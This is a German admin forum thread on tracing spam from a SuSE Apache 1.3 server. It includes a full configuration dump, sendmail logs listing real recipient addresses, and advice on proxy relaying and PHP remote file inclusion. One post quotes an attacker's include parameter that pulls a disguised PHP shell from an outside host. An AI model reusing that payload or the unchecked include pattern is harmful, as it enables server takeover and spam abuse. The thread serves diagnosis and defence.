Module Directives:
    AgentLog - the filename of the agent log 
Current Configuration:
Module Name: mod_log_config.c
Content handlers: none
Configuration Phase Participation: Create Server Config, Merge Server Configs
Request Phase Participation: Logging
Module Directives:
    CustomLog - a file name, a custom log format string or format name, and an optional "env=" clause (see docs) 
    TransferLog - the filename of the access log 
    LogFormat - a log format string (see docs) and an optional format name 
    CookieLog - the filename of the cookie log 
Current Configuration:
/etc/httpd/httpd.conf
    LogFormat "%h %l %u %v %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"" combined
    LogFormat "%h %l %u %t "%r" %>s %b" common
    LogFormat "%{Referer}i -> %U" referer
    LogFormat "%{User-agent}i" agent
    CustomLog /var/log/httpd/access_log combined
    CustomLog /srv/www/htdocs/web100/log/access_log confixx2
    CustomLog /srv/www/htdocs/web150/log/access_log confixx2
    CustomLog /srv/www/htdocs/web100/log/access_log confixx2
Module Name: mod_define.c
Content handlers: none
Configuration Phase Participation: none
Request Phase Participation: none
Module Directives:
    Define - Define a configuration variable 
Current Configuration:
Module Name: mod_env.c
Content handlers: none
Configuration Phase Participation: Create Directory Config, Merge Directory Configs
Request Phase Participation: Fixups
Module Directives:
    PassEnv - a list of environment variables to pass to CGI. 
    SetEnv - an environment variable name and a value to pass to CGI. 
    UnsetEnv - a list of variables to remove from the CGI environment. 
Current Configuration:
Module Name: mod_vhost_alias.c
Content handlers: none
Configuration Phase Participation: Create Server Config, Merge Server Configs
Request Phase Participation: Translate Path
Module Directives:
    VirtualScriptAlias - how to create a ScriptAlias based on the host 
    VirtualDocumentRoot - how to create the DocumentRoot based on the host 
    VirtualScriptAliasIP - how to create a ScriptAlias based on the host 
    VirtualDocumentRootIP - how to create the DocumentRoot based on the host 
Current Configuration:
Module Name: mod_mmap_static.c
Content handlers: */*
Configuration Phase Participation: Create Server Config
Request Phase Participation: Translate Path
Module Directives:
    mmapfile - A space separated list of files to mmap at config time 
Current Configuration:
Module Name: http_core.c
Content handlers: */* , default-handler
Configuration Phase Participation: Create Directory Config, Merge Directory Configs, Create Server Config, Merge Server Configs
Request Phase Participation: Translate Path, Check Access, Check Type
Module Directives:
    <Directory - Container for directives affecting resources located in the specified directories 
    </Directory> - Marks end of 
    <Location - Container for directives affecting resources accessed through the specified URL paths 
    </Location> - Marks end of 
    <VirtualHost - Container to map directives to a particular virtual host, takes one or more host addresses 
    </VirtualHost> - Marks end of 
    <Files - Container for directives affecting files matching specified patterns 
    </Files> - Marks end of 
    <Limit - Container for authentication directives when accessed using specified HTTP methods 
    </Limit> - Marks end of 
    <LimitExcept - Container for authentication directives to be applied when any HTTP method other than those specified is used to access the resource 
    </LimitExcept> - Marks end of 
    <IfModule - Container for directives based on existance of specified modules 
    </IfModule> - Marks end of 
    <IfDefine - Container for directives based on existance of command line defines 
    </IfDefine> - Marks end of 
    <DirectoryMatch - Container for directives affecting resources located in the specified directories 
    </DirectoryMatch> - Marks end of 
    <LocationMatch - Container for directives affecting resources accessed through the specified URL paths 
    </LocationMatch> - Marks end of 
    <FilesMatch - Container for directives affecting files matching specified patterns 
    </FilesMatch> - Marks end of 
    AuthType - An HTTP authorization type (e.g., "Basic") 
    AuthName - The authentication realm (e.g. "Members Only") 
    AuthDigestRealmSeed - An authentication token which should be different for each logical realm. A random value or the servers IP may be a good choise. 
    Require - Selects which authenticated users or groups may access a protected space 
    Satisfy - access policy if both allow and require used ('all' or 'any') 
    AddDefaultCharset - The name of the default charset to add to any Content-Type without one or 'Off' to disable 
    AccessFileName - Name(s) of per-directory config files (default: .htaccess) 
    DocumentRoot - Root directory of the document tree 
    ErrorDocument - Change responses for HTTP errors 
    AllowOverride - Controls what groups of directives can be configured by per-directory config files 
    Options - Set a number of attributes for a given directory 
    DefaultType - the default MIME type for untypable files 
    ServerType - 'inetd' or 'standalone' 
    Port - A TCP port number 
    HostnameLookups - "on" to enable, "off" to disable reverse DNS lookups, or "double" to enable double-reverse DNS lookups 
    User - Effective user id for this server 
    Group - Effective group id for this server 
    ServerAdmin - The email address of the server administrator 
    ServerName - The hostname of the server 
    ServerSignature - En-/disable server signature (on|off|email) 
    ServerRoot - Common directory of server-related files (logs, confs, etc.) 
    ErrorLog - The filename of the error log 
    PidFile - A file for logging the server process ID 
    ScoreBoardFile - A file for Apache to maintain runtime process management information 
    LockFile - The lockfile used when Apache needs to lock the accept() call 
    AccessConfig - The filename of the access config file 
    ResourceConfig - The filename of the resource config file 
    ServerAlias - A name or names alternately used to access the server 
    ServerPath - The pathname the server can be reached at 
    Timeout - Timeout duration (sec) 
    KeepAliveTimeout - Keep-Alive timeout duration (sec) 
    MaxKeepAliveRequests - Maximum number of Keep-Alive requests per connection, or 0 for infinite 
    KeepAlive - Whether persistent connections should be On or Off 
    IdentityCheck - Enable identd (RFC 1413) user lookups - SLOW 
    ContentDigest - whether or not to send a Content-MD5 header with each request 
    UseCanonicalName - How to work out the ServerName : Port when constructing URLs 
    StartServers - Number of child processes launched at server startup 
    MinSpareServers - Minimum number of idle children, to handle request spikes 
    MaxSpareServers - Maximum number of idle children 
    MaxServers - Deprecated equivalent to MaxSpareServers 
    ServersSafetyLimit - Deprecated equivalent to MaxClients 
    MaxClients - Maximum number of children alive at the same time 
    MaxRequestsPerChild - Maximum number of requests a particular child serves before dying. 
    RLimitCPU - Soft/hard limits for max CPU usage in seconds 
    RLimitMEM - Soft/hard limits for max memory usage per process 
    RLimitNPROC - soft/hard limits for max number of processes per uid 
    BindAddress - '*', a numeric IP address, or the name of a host with a unique IP address 
    Listen - A port number or a numeric IP address and a port number 
    SendBufferSize - Send buffer size in bytes 
    AddModule - The name of a module 
    ClearModuleList - 
    ThreadsPerChild - Number of threads a child creates 
    ExcessRequestsPerChild - Maximum number of requests a particular child serves after it is ready to die. 
    ListenBacklog - Maximum length of the queue of pending connections, as used by listen(2) 
    AcceptFilter - Switch AcceptFiltering on/off (default is on).This feature is currently not compiled in; so this directive is ignored. 
    CoreDumpDirectory - The location of the directory Apache changes to before dumping core 
    Include - Name of the config file to be included 
    LogLevel - Level of verbosity in error logging 
    NameVirtualHost - A numeric IP address:port, or the name of a host 
    CGICommandArgs - Allow or Disallow CGI requests to pass args on the command line 
    ServerTokens - Tokens displayed in the Server: header - Min[imal], OS, Prod[uctOnly], Full 
    LimitRequestLine - Limit on maximum size of an HTTP request line 
    LimitRequestFieldsize - Limit on maximum size of an HTTP request header field 
    LimitRequestFields - Limit (0 = unlimited) on max number of header fields in a request message 
    LimitRequestBody - Limit (in bytes) on maximum size of request message body 
    ProtocolReqCheck - Enable strict checking of Protocol type in requests 
    ShmemUIDisUser - Enable the setting of SysV shared memory scoreboard uid/gid to User/Group 
    AcceptMutex - Serialized Accept Mutex; the methods 'sysvsem' 'fcntl' are compiled in 
    EnableExceptionHook - Controls whether exception hook may be called after a crash 
    FileETag - Specify components used to construct a file's ETag 
    LimitInternalRecursion - maximum recursion depth of internal redirects and subrequests 
Current Configuration:
/etc/httpd/httpd.conf
    ServerType standalone
    ServerRoot "/srv/www"
    LockFile /var/lock/subsys/httpd/httpd.accept.lock
    PidFile /var/run/httpd.pid
    ScoreBoardFile /var/run/httpd.scoreboard
    Timeout 300
    KeepAlive On
    MaxKeepAliveRequests 100
    KeepAliveTimeout 15
    MinSpareServers 10
    MaxSpareServers 20
    StartServers 50
    MaxClients 150
    MaxRequestsPerChild 0
    Include /etc/httpd/suse_loadmodule.conf
    ClearModuleList
    AddModule mod_mmap_static.c
    AddModule mod_vhost_alias.c
    AddModule mod_env.c
    AddModule mod_define.c
    AddModule mod_log_config.c
    AddModule mod_log_agent.c
    AddModule mod_log_referer.c
    AddModule mod_mime_magic.c
    AddModule mod_mime.c
    AddModule mod_negotiation.c
    AddModule mod_status.c
    AddModule mod_info.c
    AddModule mod_include.c
    AddModule mod_autoindex.c
    AddModule mod_dir.c
    AddModule mod_cgi.c
    AddModule mod_asis.c
    AddModule mod_imap.c
    AddModule mod_actions.c
    AddModule mod_speling.c
    AddModule mod_alias.c
    AddModule mod_rewrite.c
    AddModule mod_access.c
    AddModule mod_auth.c
    AddModule mod_auth_anon.c
    AddModule mod_auth_dbm.c
    AddModule mod_auth_db.c
    AddModule mod_digest.c
    AddModule mod_proxy.c
    AddModule mod_cern_meta.c
    AddModule mod_expires.c
    AddModule mod_headers.c
    AddModule mod_usertrack.c
    AddModule mod_so.c
    AddModule mod_setenvif.c
    Include /etc/httpd/suse_addmodule.conf
    <IfModule mod_dav.c>
    </IfModule>
    Port 80
    <IfDefine SSL>
    Listen 80
    Listen 443
    </IfDefine>
    User wwwrun
    Group www
    ServerAdmin webmster@mail.movetec-server.ch
    ServerName mail.movetec-server.ch
    DocumentRoot "/srv/www/htdocs"
    <Directory /> 
      Options -FollowSymLinks +Multiviews
      AllowOverride All
    </Directory> 
    <Directory "/srv/www/htdocs"> 
      Options Indexes -FollowSymLinks +Includes MultiViews
      AllowOverride All
      <IfModule mod_dav.c>
      </IfModule>
    </Directory> 
    AccessFileName .htaccess
    <Files ~ "^.ht"> 
      Satisfy All
    </Files> 
    UseCanonicalName Off
    <IfModule mod_mime.c>
    </IfModule>
    DefaultType text/plain
    <IfModule mod_mime_magic.c>
    </IfModule>
    HostnameLookups Off
    <IfModule mod_backhand.c>
    </IfModule>
    <IfModule mod_bandwidth.c>
    </IfModule>
    ServerSignature On
    <IfModule mod_alias.c>
    <Directory "/srv/www/icons"> 
      Options Indexes MultiViews
      AllowOverride None
    </Directory> 
    <Directory "/srv/www/htdocs/manual"> 
      Options Indexes FollowSymlinks MultiViews
      AllowOverride None
    </Directory> 
    <IfModule mod_perl.c>
    </IfModule>
    <Directory "/srv/www/cgi-bin"> 
      AllowOverride None
      Options None
    </Directory> 
    </IfModule>
    <Location /cgi-bin> 
      AllowOverride None
      Options +ExecCGI -Includes
    </Location> 
    <IfModule mod_perl.c>
    <Location /perl> 
      Options ExecCGI
    </Location> 
    <Location /cgi-perl> 
      Options ExecCGI
    </Location> 
    </IfModule>
    <IfModule mod_autoindex.c>
    </IfModule>
    <IfModule mod_mime.c>
    <IfModule mod_negotiation.c>
    </IfModule>
    <IfModule mod_php3.c>
    </IfModule>
    <IfModule mod_php4.c>
    </IfModule>
    <IfModule mod_dtcl.c>
    </IfModule>
    </IfModule>
    <IfModule mod_setenvif.c>
    </IfModule>
    <IfDefine STATUS>
    <IfModule mod_perl.c>
    </IfModule>
    </IfDefine>
    <IfDefine SSL>
    </IfDefine>
    <IfModule mod_ssl.c>
    </IfModule>
    <IfDefine SSL>
    Include /etc/httpd/suse_include.conf
    <Directory "/srv/www/htdocs/confixx/html"> 
      AllowOverride all
    </Directory> 
    NameVirtualHost 217.172.167.100:80
    NameVirtualHost 217.172.167.100:443
    Include /etc/httpd/confixx_vhost.conf
    <VirtualHost 217.172.167.100:443>
    ServerName movetec.ch
    ServerAlias ihr-internetpartner.ch www.movetec.ch www.movetec.biz movetec.biz web100.movetec-server.ch movetec.ch movetec.info www.movetec.info www.ideenmaschine.ch ideenmaschine.ch isler.movetec.ch maz.se www.maz.se moveserver.de www.moveserver.de moveserver.com www.moveserver.com www.ihr-internetpartner.ch
    DocumentRoot /srv/www/htdocs/web100/html
    User web100
    Group ftponly
    ServerSignature On
    </VirtualHost>
    <VirtualHost 217.172.167.100:443>
    ServerName web150.movetec-server.ch
    ServerAlias www.softgate.ch softgate.ch
    DocumentRoot /srv/www/htdocs/web150/html
    User web150
    Group ftponly
    ServerSignature On
    </VirtualHost>
    <VirtualHost 217.172.167.100:80>
    ServerName mars84.plusserver.de
    ServerAlias pluto13.plusserver.de
    ServerAlias *.movetec-server.ch *.visualtouch.net *.kunden-login.serrico.ch
    ServerAlias movetec-server.ch visualtouch.net kunden-login.serrico.ch
    DocumentRoot /srv/www/htdocs/confixx/html
    <Directory "/srv/www/htdocs/confixx/html/user/awstats"> 
      Options -Indexes +ExecCGI
    </Directory> 
    <Directory "/proc"> 
      Options -Indexes +ExecCGI
    </Directory> 
    </VirtualHost>
    <VirtualHost 217.172.167.100:80>
    ServerName movetec.ch
    ServerAlias *
    DocumentRoot /srv/www/htdocs/web100/html/standartseite
    User web100
    Group ftponly
    </VirtualHost>
    <Directory "/srv/www/htdocs/"> 
      AllowOverride All
      Options +SymLinksIfOwnerMatch
    </Directory> 

Apache/1.3.33 Server at www.movetec.ch Port 80

[Joe User]

http://de.wikipedia.org/wiki/Proxy
http://httpd.apache.org/docs/1.3/mod/mod_proxy.html
http://www.google.com/search?hl=en&q=ap ... gle+Search

[greenrover]

@ joe .... ich formuliere meinen fragen eu.....

Was ein proxy ist weis ich....

aber nicht wie man darüber spam versenden kann.

[Roger Wilco]

Was ein proxy ist weis ich....

aber nicht wie man darüber spam versenden kann.

Dann weißt du offenbar nicht, was ein Proxy ist. Stichwort CONNECT Methode von HTTP.

[greenrover]

Dann erkläre es mir doch einfach.....

Den laut meines Wissen reicht cachet ein proxy daten nur zwischen um sie ab der 2tenabfrage schneller liefern zu können.

aber wie soll man damit mails über den lokalen sendmail verschicken können.

[Roger Wilco]

Den laut meines Wissen reicht cachet ein proxy daten nur zwischen um sie ab der 2tenabfrage schneller liefern zu können.

Das stimmt schon nicht. Ein Proxy muß nicht zwangsweise einen Cache beinhalten. Tatsächlich cached mod_proxy überhaupt nicht. Dafür ist mod_cache zuständig. Das kannst du übrigens auch im Apache Manual nachlesen.

aber wie soll man damit mails über den lokalen sendmail verschicken können.

Lies einfach http://de.wikipedia.org/wiki/Proxy und verstehe es vor allem...

[greenrover]

also du bist der meinung das durch die aktivierung des mod_proxy ein mail_open relay geschaffen wurde ?!
Aber soweit ich das sehe ist der mod doch nur für FTP und HTTP ?!

Ich habe jetzt den mod_proxy raus genommen ... kann es noch weitere auswirkungengen haben ?!


BZW währe noch andere gründe für dne spam versand möglich ?!

[Joe User]

Lies doch mal die Google-Treffer obiger Query...

[flo]

BZW währe noch andere gründe für dne spam versand möglich ?!

Ich wäre so auch nicht darauf gekommen, aber es liegt nahe - den Proxy lade ich bei mir nur, wenn es wirklich nicht anders geht. Natürlich kannst Du per Proxy auch auf Port 443 gehen, was liegt da näher, als den Connect auf den 25er Port zu fahren, um sich auf den lokalen SMTP-Server zu hängen, der immer relayed, wenn dies nicht abgeschalten ist?

Gerade wenn Du den Zugriff nicht auf ein Script zurückverfolgen kannst und die Last nach herunterfahren des Apache wegfällt, ist das sehr wahrscheinlich.

flo.

[greenrover]

Ok, danke euch allen fürs erste....

Gäbe es jetzt eigentloich noch eine möglichkeit den verursacher zu lokalisieren und ein wenig auf die finger zu klopfen?!

BZW müssten nicht auch dir proxy zugriffe auch im access lgo auftauchen?! oder giebt es da ein anderes log.... sry das ich soo viel frage aber bin da aus der apache doku net ganzschlau geworden.


Und währe mal einer so nett sich oben die configuration an zu gucken und mir zu sagen was daran noch nicht IO ist... Das ding ist eigentlcih einreiner webserver mit PHP, perl und Frontpage... Jserv läuft auch mit aber funst nicht so wirklich (das heist 1 von 2 java kunden gehen nicht richtig)

[greenrover]

Das problem ist leider immer noch nicht behoben....

Hat noch jemand einen Idee wo oder wie ich das Problem finden kann?!

[Roger Wilco]

Hast du mod_proxy inzwischen entfernt?
Welche Meldungen stehen in den Mail Logs zu den Mails, z. B. die einliefernde UID?

[greenrover]

ja der mod_proxy ist raus....

Und hier ein wahloser auszug aus dem log....

Code: Select all

Apr 22 07:40:02 mail spamd[29871]: spamd: processing message <200604220538.k3M5c4V1028364@mail.movetec-server.ch> for wwwrun:0 
Apr 22 07:40:02 mail sendmail[30426]: k3M5e1EX030426: from=wwwrun, size=5134, class=0, nrcpts=1, msgid=<2c8133b0eee7ce076b68df173c0baaea@>, bodytype=8BITMIME, relay=wwwrun@localhost
Apr 22 07:40:02 mail sendmail[30426]: k3M5e1EX030426: to=aquino@inet.com.br, ctladdr=wwwrun (30/8), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=35134, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
Apr 22 07:40:02 mail spamd[29871]: spamd: clean message (-1.3/100.0) for wwwrun:0 in 0.6 seconds, 7382 bytes. 
Apr 22 07:40:02 mail spamd[29871]: spamd: result: . -1 - AWL,BAYES_00,HTML_MESSAGE,HTML_TAG_BALANCE_HEAD,NO_RELAYS scantime=0.6,size=7382,user=wwwrun,uid=0,required_score=100.0,rhost=localhost,raddr=127.0.0.1,rport=39000,mid=<200604220538.k3M5c4V1028364@mail.movetec-server.ch>,bayes=0,autolearn=no 
Apr 22 07:40:02 mail spamd[29184]: prefork: child states: II 
Apr 22 07:40:02 mail sendmail-client[4556]: k3M2AZUT027615: to=clsg@fucapi.br, ctladdr=wwwrun (30/8), delay=03:29:27, xdelay=00:00:01, mailer=relay, pri=127917, relay=[127.0.0.1] [127.0.0.1], dsn=2.0.0, stat=Sent (k3M5Wg3J015465 Message accepted for delivery)
Apr 22 07:40:02 mail sendmail[30434]: k3M5e2GA030434: from=wwwrun, size=5141, class=0, nrcpts=1, msgid=<2c8133b0eee7ce076b68df173c0baaea@>, bodytype=8BITMIME, relay=wwwrun@localhost
Apr 22 07:40:02 mail sendmail[30434]: k3M5e2GA030434: to=aquabel1@mgate.com.br, ctladdr=wwwrun (30/8), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=35141, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
Apr 22 07:40:02 mail sendmail[30436]: k3M5e26R030436: from=wwwrun, size=5141, class=0, nrcpts=1, msgid=<2c8133b0eee7ce076b68df173c0baaea@>, bodytype=8BITMIME, relay=wwwrun@localhost
Apr 22 07:40:02 mail sendmail[30436]: k3M5e26R030436: to=aquabel2@mgate.com.br, ctladdr=wwwrun (30/8), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=35141, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
Apr 22 07:40:02 mail sendmail[30438]: k3M5e21t030438: from=wwwrun, size=5141, class=0, nrcpts=1, msgid=<2c8133b0eee7ce076b68df173c0baaea@>, bodytype=8BITMIME, relay=wwwrun@localhost
Apr 22 07:40:02 mail spamd[29871]: spamd: connection from localhost [127.0.0.1] at port 39005 
Apr 22 07:40:02 mail spamd[29871]: config: failed to parse line, skipping: rewrite_subject_0 
Apr 22 07:40:02 mail spamd[29871]: spamd: processing message <200604220529.k3M5TRV1017095@mail.movetec-server.ch> for wwwrun:0 
Apr 22 07:40:03 mail sendmail[30438]: k3M5e21t030438: to=aquabel3@mgate.com.br, ctladdr=wwwrun (30/8), delay=00:00:01, xdelay=00:00:00, mailer=relay, pri=35141, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
Apr 22 07:40:03 mail sendmail-client[4556]: k3M2DYtL031330: to=clt@bol.com.br, ctladdr=wwwrun (30/8), delay=03:26:29, xdelay=00:00:01, mailer=relay, pri=127917, relay=[127.0.0.1] [127.0.0.1], dsn=2.0.0, stat=Sent (k3M5Wg3L015465 Message accepted for delivery)
Apr 22 07:40:03 mail spamd[29871]: spamd: clean message (-1.3/100.0) for wwwrun:0 in 0.4 seconds, 7662 bytes. 
Apr 22 07:40:03 mail spamd[29871]: spamd: result: . -1 - AWL,BAYES_00,HTML_MESSAGE,HTML_TAG_BALANCE_HEAD,NO_RELAYS scantime=0.4,size=7662,user=wwwrun,uid=0,required_score=100.0,rhost=localhost,raddr=127.0.0.1,rport=39005,mid=<200604220529.k3M5TRV1017095@mail.movetec-server.ch>,bayes=2.22044604925031e-16,autolearn=no 
Apr 22 07:40:03 mail spamd[29184]: prefork: child states: II 
Apr 22 07:40:03 mail sendmail[30445]: k3M5e360030445: from=wwwrun, size=5136, class=0, nrcpts=1, msgid=<2c8133b0eee7ce076b68df173c0baaea@>, bodytype=8BITMIME, relay=wwwrun@localhost
Apr 22 07:40:03 mail sendmail[30445]: k3M5e360030445: to=aquabel@mgate.com.br, ctladdr=wwwrun (30/8), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=35136, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
Apr 22 07:40:03 mail sendmail-client[4556]: k3M2DaAe031394: to=cltp@fucapi.br, ctladdr=wwwrun (30/8), delay=03:26:27, xdelay=00:00:00, mailer=relay, pri=127917, relay=[127.0.0.1] [127.0.0.1], dsn=2.0.0, stat=Sent (k3M5Wg3N015465 Message accepted for delivery)
Apr 22 07:40:03 mail sendmail[30450]: k3M5e3xA030450: from=wwwrun, size=5129, class=0, nrcpts=1, msgid=<2c8133b0eee7ce076b68df173c0baaea@>, bodytype=8BITMIME, relay=wwwrun@localhost
Apr 22 07:40:03 mail sendmail[30450]: k3M5e3xA030450: to=aquino@mma.com.br, ctladdr=wwwrun (30/8), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=35129, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
Apr 22 07:40:03 mail sendmail[30452]: k3M5e3aP030452: from=wwwrun, size=5143, class=0, nrcpts=1, msgid=<2c8133b0eee7ce076b68df173c0baaea@>, bodytype=8BITMIME, relay=wwwrun@localhost
Apr 22 07:40:03 mail sendmail[30452]: k3M5e3aP030452: to=aquino051@nuxnet.com.br, ctladdr=wwwrun (30/8), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=35143, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
Apr 22 07:40:03 mail sendmail-client[4556]: k3M2DaXj031400: to=cltr@fucapi.br, ctladdr=wwwrun (30/8), delay=03:26:27, xdelay=00:00:00, mailer=relay, pri=127917, relay=[127.0.0.1] [127.0.0.1], dsn=2.0.0, stat=Sent (k3M5Wg3P015465 Message accepted for delivery)
Apr 22 07:40:03 mail sendmail[30456]: k3M5e3ef030456: from=wwwrun, size=5143, class=0, nrcpts=1, msgid=<2c8133b0eee7ce076b68df173c0baaea@>, bodytype=8BITMIME, relay=wwwrun@localhost
Apr 22 07:40:03 mail sendmail[30456]: k3M5e3ef030456: to=aquino052@nuxnet.com.br, ctladdr=wwwrun (30/8), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=35143, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
Apr 22 07:40:03 mail sendmail[30458]: k3M5e3JC030458: from=wwwrun, size=5143, class=0, nrcpts=1, msgid=<2c8133b0eee7ce076b68df173c0baaea@>, bodytype=8BITMIME, relay=wwwrun@localhost
Apr 22 07:40:03 mail sendmail[30458]: k3M5e3JC030458: to=aquino053@nuxnet.com.br, ctladdr=wwwrun (30/8), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=35143, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
Apr 22 07:40:03 mail sendmail-client[4556]: k3M2DbFr031425: to=clta@globo.com, ctladdr=wwwrun (30/8), delay=03:26:26, xdelay=00:00:00, mailer=relay, pri=127917, relay=[127.0.0.1] [127.0.0.1], dsn=2.0.0, stat=Sent (k3M5Wg3R015465 Message accepted for delivery)
Apr 22 07:40:03 mail sendmail[30462]: k3M5e3tn030462: from=wwwrun, size=5142, class=0, nrcpts=1, msgid=<2c8133b0eee7ce076b68df173c0baaea@>, bodytype=8BITMIME, relay=wwwrun@localhost
Apr 22 07:40:03 mail sendmail[30462]: k3M5e3tn030462: to=aquino05@nuxnet.com.br, ctladdr=wwwrun (30/8), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=35142, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]

[timeless2]

Betroffen war in dem Thread zwar Postfix, aber zur Suche nach dem Skript sollten die Ratschläge trotzdem weiterhelfen: http://www.rootforum.org/forum/viewtopic.php?t=38977

[greenrover]

danke timless.. ich habe jetzt mal einen der wrapper eingebaut und er hat mir das script im anhang identifiziert...

diese tauch aber tauch nur sehr selten im apache access log auf..

und wird mit dem parameter: seite=http://archit3ct.5gigs.com/shellr57.gif?

aufgerufen.
aber ich raff nicht wie dadurch vode ausgeführt werden kann..

der sollte den dochnur darstellen oder nicht ?!

das wird doch durch kein eval oder so gejagt ?!

Kann mir das mal jemand erklären...

http://greenrover.go4it-fm.de/include_as_iframe.rar

[timeless2]

also bei Daten die von Website-Besuchern übermittelt (und manipuliert) werden, die du dann noch per include() ungeprüft einbindest, ist schon riskant.

[lord_pinhead]

PHP ist es egal was es included, alles wieder verarbeitet egal welches Dateisuffix da ist.
Das "gif" ist eigentlich ein PHP Programm, das included er und dann wird es ausgeführt. An sich relativ einfach und keiner kommt auf die Idee danach in den Logfiles zu suchen, ausser er weiß das.

Edit: Ist es so intelligent das du http://greenrover.go4it-fm.de einfach mit Directory Listing online stellst? Vor allem solche Sachen: http://greenrover.go4it-fm.de/sicherung/wlan.txt oder http://greenrover.go4it-fm.de/sicherung/bookmarks.html (man beachte das große auftreten von XXX :D ). Und wer von denen bist jetzt du? http://greenrover.go4it-fm.de/oesterrei ... %20009.jpg ;)